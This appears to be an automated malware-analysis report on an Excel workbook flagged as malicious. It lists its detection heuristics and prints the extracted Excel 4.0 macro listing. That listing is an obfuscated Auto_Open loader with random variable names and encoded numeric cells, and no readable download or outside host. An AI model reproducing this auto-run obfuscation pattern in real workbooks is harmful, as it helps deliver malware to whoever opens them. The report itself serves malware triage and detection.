MALICIOUS
142
Risk Score
Heuristics 4
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6837 bytes |
SHA-256: 654f47a6b276f1a7316a793303d502c2a27cf71e6bba74571a2c3a51cf29b5a0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
21 of 40 identifiers look randomly generated (e.g. 'kcwbDeDSdxTV') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - iRxLdvxxF
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C158
' 0018 22 LABEL : Cell Value, String Constant - FNuDQNs len=0
' 0018 24 LABEL : Cell Value, String Constant - fwouYWWfR len=0
' 0018 24 LABEL : Cell Value, String Constant - GCLdZUQhD len=0
' 0018 26 LABEL : Cell Value, String Constant - GktZFDHVKhM len=0
' 0018 25 LABEL : Cell Value, String Constant - gVdjHayIBi len=0
' 0018 22 LABEL : Cell Value, String Constant - HHBliDl len=0
' 0018 24 LABEL : Cell Value, String Constant - HzFqoAQsA len=0
' 0018 27 LABEL : Cell Value, String Constant - kcwbDeDSdxTV len=0
' 0018 23 LABEL : Cell Value, String Constant - kiYsRTJn len=0
' 0018 23 LABEL : Cell Value, String Constant - ksHhDTSd len=0
' 0018 26 LABEL : Cell Value, String Constant - MwZSqPjSrco len=0
' 0018 22 LABEL : Cell Value, String Constant - NZnauZO len=0
' 0018 24 LABEL : Cell Value, String Constant - OHJBlKnYn len=0
' 0018 27 LABEL : Cell Value, String Constant - oXGORGsKHDmE len=0
' 0018 27 LABEL : Cell Value, String Constant - rNFfYepuUuiP len=0
' 0018 22 LABEL : Cell Value, String Constant - rUKtCSL len=0
' 0018 22 LABEL : Cell Value, String Constant - TunCuSN len=0
' 0018 23 LABEL : Cell Value, String Constant - vbcpVZHy len=0
' 0018 27 LABEL : Cell Value, String Constant - WYctQjcLqoZU len=0
' 0018 27 LABEL : Cell Value, String Constant - YoeYNuvpHYCd len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' iRxLdvxxF,C64,"SET.NAME("fwouYWWfR",0+VALUE("0"))",""
' iRxLdvxxF,C69,"SET.NAME("HzFqoAQsA",fwouYWWfR)",""
' iRxLdvxxF,C72,"SET.NAME("TunCuSN",fwouYWWfR)",""
' iRxLdvxxF,C76,"SET.NAME("kiYsRTJn",COUNTA(OHJBlKnYn))",""
' iRxLdvxxF,C78,"SET.NAME("oXGORGsKHDmE",COUNTA(YoeYNuvpHYCd))",""
' iRxLdvxxF,C82,[],""
' iRxLdvxxF,C86,"SET.NAME("vbcpVZHy","")",""
' iRxLdvxxF,C89,"HzFqoAQsA",""
' iRxLdvxxF,C93,"SET.NAME("NZnauZO",HLOOKUP("*",OHJBlKnYn,HzFqoAQsA,FALSE))",""
' iRxLdvxxF,R96,"",-249.00000000000000000000
' iRxLdvxxF,C97,"GCLdZUQhD",""
' iRxLdvxxF,R97,"",-242.00000000000000000000
' iRxLdvxxF,R98,"",-305.00000000000000000000
' iRxLdvxxF,R99,"",-320.00000000000000000000
' iRxLdvxxF,C100,"SET.NAME("FNuDQNs",fwouYWWfR)",""
' iRxLdvxxF,R100,"",-383.00000000000000000000
' iRxLdvxxF,R101,"",574.00000000000000000000
' iRxLdvxxF,C102,[],""
' iRxLdvxxF,C107,"FNuDQNs",""
' iRxLdvxxF,C112,"GktZFDHVKhM",""
' iRxLdvxxF,C116,"WYctQjcLqoZU",""
' iRxLdvxxF,C120,"MwZSqPjSrco",""
' iRxLdvxxF,C123,"SET.NAME("rNFfYepuUuiP",VALUE(HLOOKUP("*",YoeYNuvpHYCd,MwZSqPjSrco,FALSE)))",""
' iRxLdvxxF,C126,"rUKtCSL",""
' iRxLdvxxF,C131,"vbcpVZHy",""
' iRxLdvxxF,C134,"TunCuSN",""
' iRxLdvxxF,C136,NEXT(),""
' iRxLdvxxF,C139,"ksHhDTSd",""
' iRxLdvxxF,C144,[],""
' iRxLdvxxF,C147,"HHBliDl",""
' iRxLdvxxF,C151,NEXT(),""
' iRxLdvxxF,C154,RETURN(),""
' iRxLdvxxF,C175,"SET.NAME("gVdjHayIBi",C64)",""
' iRxLdvxxF,C177,"OHJBlKnYn",""
' iRxLdvxxF,C181,"SET.NAME("YoeYNuvpHYCd",R67C13)",""
' iRxLdvxxF,C183,"SET.NAME("HHBliDl",190)",""
' iRxLdvxxF,C186,"SET.NAME("kcwbDeDSdxTV",3)",""
' iRxLdvxxF,C189,gVdjHayIBi(),""
' iRxLdvxxF,C190,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.